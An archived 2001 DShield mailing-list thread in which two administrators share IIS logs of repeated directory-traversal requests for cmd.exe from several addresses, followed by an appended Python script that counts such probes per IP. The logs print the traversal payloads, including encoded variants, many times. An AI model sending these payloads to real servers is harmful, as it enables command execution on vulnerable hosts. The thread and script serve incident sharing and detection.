[Dshield] Check this out.

Sean Graham seangra at yahoo.com
Mon Aug 20 16:58:08 GMT 2001


day-am!  Never noticed these before:

What-in-the-heck-are-these?

Note the IP similarities in 2 of the 3 to yours.

-- Sean

2001-07-24 20:16:42 61.151.255.114 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 70 -
2001-07-24 20:16:42 61.151.255.114 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-07-24 20:16:43 61.151.255.114 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:43 61.151.255.114 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:44 61.151.255.114 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:44 61.151.255.114 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:45 61.151.255.114 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:45 61.151.255.114 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 0 -
2001-07-24 20:16:46 61.151.255.114 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 -
2001-07-24 20:16:46 61.151.255.114 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 -
2001-07-24 20:16:48 61.151.255.114 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-07-24 20:16:48 61.151.255.114 - GET 
/scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-07-24 20:16:49 61.151.255.114 - GET 
/scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 10 -
2001-07-24 20:16:49 61.151.255.114 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 20 -
2001-08-10 12:13:40 61.182.207.228 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 90 -
2001-08-10 12:13:41 61.182.207.228 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-10 12:13:43 61.182.207.228 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:13:54 61.182.207.228 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:13:56 61.182.207.228 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 10 -
2001-08-10 12:14:00 61.182.207.228 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:14:02 61.182.207.228 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:14:04 61.182.207.228 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-10 12:14:06 61.182.207.228 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 -
2001-08-10 12:14:11 61.182.207.228 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 -
2001-08-10 12:14:16 61.182.207.228 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-08-10 12:14:24 61.182.207.228 - GET 
/scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-08-10 12:14:34 61.182.207.228 - GET 
/scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 0 -
2001-08-10 12:14:39 61.182.207.228 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 40 -
2001-08-13 14:14:00 210.42.24.20 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 120 -
2001-08-13 14:14:00 210.42.24.20 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-13 14:14:01 210.42.24.20 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:01 210.42.24.20 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:03 210.42.24.20 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:03 210.42.24.20 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:04 210.42.24.20 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-13 14:14:08 210.42.24.20 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-13 14:14:08 210.42.24.20 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 10 -
2001-08-13 14:14:10 210.42.24.20 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 0 -
2001-08-13 14:14:10 210.42.24.20 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 0 -
2001-08-13 14:14:12 210.42.24.20 - GET 
/scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-08-13 14:14:12 210.42.24.20 - GET 
/scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 0 -
2001-08-13 14:14:13 210.42.24.20 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 40 -

At 08:29 AM 8/20/2001 -0400, you wrote:
>This is a welcoming log entry on a Monday Morning.  Anybody else get any of
>these babies over the weekend?  It's from CHINANET Shandong province
>network.
>
>2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:48 61.156.28.14 - GET
>/scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:50 61.156.28.14 - GET
>/scripts/..À%9v../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:50 61.156.28.14 - GET
>/scripts/..À%qf../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:50 61.156.28.14 - GET
>/scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:51 61.156.28.14 - GET
>/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:51 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:51 61.156.28.14 - GET /scripts/..o../winnt/system32/cmd.exe
>/c+dir 401 80 - - -
>2001-08-19 17:41:53 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>2001-08-19 17:41:53 61.156.28.14 - GET
>/scripts/..ðEUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:53 61.156.28.14 - GET
>/scripts/..øEUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:54 61.156.28.14 - GET
>/scripts/..üEUREUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
>2001-08-19 17:41:54 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
>
>Paul M. Marsh
>IT Manager
>Nellie Mae Education Foundation
>Tel. #  781-348-4235
>Pager 877-372-1927
>
>www.nmefdn.org


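A triage sketch for log excerpts like the ones in this thread, added here as an example and not part of either poster's message: it rejoins the mail-wrapped records, counts requests for cmd.exe per client address with the status codes returned, and groups the sources by first octet. The field order is an assumption read off the excerpts, and the function names and the 192.0.2.10 record are constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: records copied from the post's excerpts in their
# mail-wrapped form, plus one ordinary request (192.0.2.10) added for contrast.
SAMPLE = """\
2001-07-24 20:16:42 61.151.255.114 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 70 -
2001-08-10 12:14:39 61.182.207.228 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 40 -
2001-08-13 14:14:01 210.42.24.20 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
>2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
>- - -
2001-08-19 18:00:00 192.0.2.10 - GET /default.htm - 200 1024 66 0 -
"""
RECORD_START = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} ")

def records(text):
    """Strip '>' quote marks and rejoin records the mailer wrapped."""
    out = []
    for raw in text.splitlines():
        line = raw.lstrip("> ").strip()
        if RECORD_START.match(line):
            out.append(line)
        elif out and line:
            out[-1] += " " + line
    return out

def triage(text):
    """Per client IP: cmd.exe request count, status codes, any 2xx answers.
    Assumed field order: date time c-ip user method uri-stem uri-query status."""
    report = defaultdict(lambda: {"probes": 0, "status": Counter(), "answered": []})
    for rec in records(text):
        f = rec.split()
        if len(f) < 8 or not f[5].lower().endswith("/cmd.exe"):
            continue
        entry = report[f[2]]
        entry["probes"] += 1
        entry["status"][f[7]] += 1
        if f[7].startswith("2"):  # a success code here needs follow-up on the host
            entry["answered"].append(rec)
    return dict(report)

def by_first_octet(report):
    """Group requesting addresses by first octet to surface similar sources."""
    groups = defaultdict(list)
    for ip in report:
        groups[ip.split(".")[0]].append(ip)
    return dict(groups)
```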